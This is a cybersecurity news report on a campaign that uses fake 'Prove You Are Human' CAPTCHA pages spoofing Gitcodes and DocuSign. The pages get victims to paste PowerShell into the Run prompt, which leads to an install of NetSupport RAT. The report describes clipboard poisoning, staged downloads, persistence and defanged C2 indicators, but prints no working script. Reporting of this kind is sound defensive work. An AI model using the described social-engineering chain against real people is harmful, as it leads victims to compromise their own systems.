Threat actors have been found exploiting the ubiquitous “Prove You Are Human” verification systems to distribute malicious software.
Specifically, this campaign leverages spoofed websites mimicking legitimate platforms like Gitcodes and DocuSign to deceive users into executing harmful PowerShell scripts on their Windows systems.
Deceptive CAPTCHA Tactics
These scripts initiate a multi-stage attack that ultimately installs the NetSupport Remote Access Trojan (RAT), a tool originally designed for legitimate administrative purposes but frequently abused by cybercriminals for unauthorized access and control.
The attack begins with users being lured to fraudulent websites such as gitcodes[.]org, branded as “Gitcodes – #1 paste tool since 2002!” or fake DocuSign verification pages like docusign.sa[.]com.
According to the Report, these sites present users with seemingly innocuous CAPTCHA-like challenges that prompt them to copy and paste a provided script into the Windows Run prompt.
This initial script, often hosted on platforms like Gitcodes, acts as a downloader, fetching subsequent scripts from domains like tradingviewtool[.]com and tradingviewtoolz[.]com.
Sophisticated Multi-Stage Attack
Through a series of web requests, including check-ins with endpoints like https[:]//tradingviewtool[.]com/info2.php, the attack progresses through multiple stages each script downloading and executing the next culminating in the deployment of NetSupport RAT.
Persistence is achieved by embedding the malware, often disguised as “My Support” or via executables like client32.exe, into the Windows Registry’s Run key or Startup folder, ensuring it launches with every user login.
On the DocuSign spoofing front, the attackers employ clipboard poisoning techniques, where a ROT13-encoded script is copied to the victim’s clipboard upon interaction with a fake CAPTCHA checkbox.
Users are then instructed to paste and run this script via Win+R commands, triggering the download of additional payloads like wbdims.exe from GitHub or jp2launcher.exe from zipped archives.
These scripts communicate with command-and-control (C2) servers through endpoints like docusign.sa[.]com/verification/c.php, facilitating further malicious downloads and browser page refreshes to deepen the infection.
The intricate, multi-layered approach, involving repeated script executions and network calls to domains like mhousecreative[.]com or IP addresses such as 170.130.55[.]203:443, aims to evade detection by breaking the attack into smaller, less conspicuous steps.
This campaign’s infrastructure also reveals a broader ecosystem of abuse, with similar tactics observed on spoofed sites mimicking Okta and popular media apps, alongside malware hosting on platforms like Discord and GitHub.
While attribution remains unclear, patterns in domain registration (via Cloudflare, NameCheap, NameSilo), payload reuse, and delivery URLs suggest potential overlap with known threat groups like SocGholish or actors such as FIN7 and STORM-0408, all of whom have historically weaponized NetSupport Manager.
The sophistication lies in exploiting user trust in familiar online interactions, turning routine verifications into vectors for self-infection.
Cybersecurity experts urge vigilance legitimate sites rarely demand script execution, and any such prompt warrants scrutiny.
Verifying URLs, SSL certificates, and avoiding unverified clipboard content are critical steps to mitigate this threat, underscoring the need for continuous user education in an evolving landscape of social engineering attacks.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Source link
